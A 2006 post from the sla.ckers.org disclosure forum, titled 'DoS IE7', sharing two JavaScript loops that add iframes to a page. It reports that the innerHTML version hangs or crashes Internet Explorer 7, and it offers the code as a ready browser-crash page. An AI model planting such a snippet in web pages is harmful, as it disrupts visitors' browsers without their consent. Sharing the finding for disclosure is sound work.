Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
DoS IE7
Posted by: maluc
Date: November 02, 2006 09:11PM

not really sure what other use it's for. other than a browser crash or lag but:
  for(var qq=0;qq<100;qq++) {
    document.body.innerHTML += '<iframe id=1234 width=100 height=0 frameborder=0></iframe>';
  }
  alert('done');

took roughly 2 and a half minutes to complete, assuming you don't touch the window in the meantime. If you don't touch the window, it completes and works again. Otherwise it crashes. It's XML counterpart, however:
  for(var qq=0;qq<100;qq++) {
    var w = document.createElement('iframe');
    w.id     = 1234;
    w.width  = 100;
    w.height = 100;
    w.frameborder = 0;
    document.body.appendChild(w);
  }
  alert('done');

took roughly 6-7seconds to complete, and scales linearly (i.e. 400 frames took 24seconds).. It was just a simple test to see whether my code should use the XML or standard HTML method to add iframes. I didn't test in firefox, or on a blank <html><body></body></html> page cause i don't care for my purposes. Just posting it incase someone needed an ie7die.html

-maluc

Options: ReplyQuote


Sorry, only registered users may post in this forum.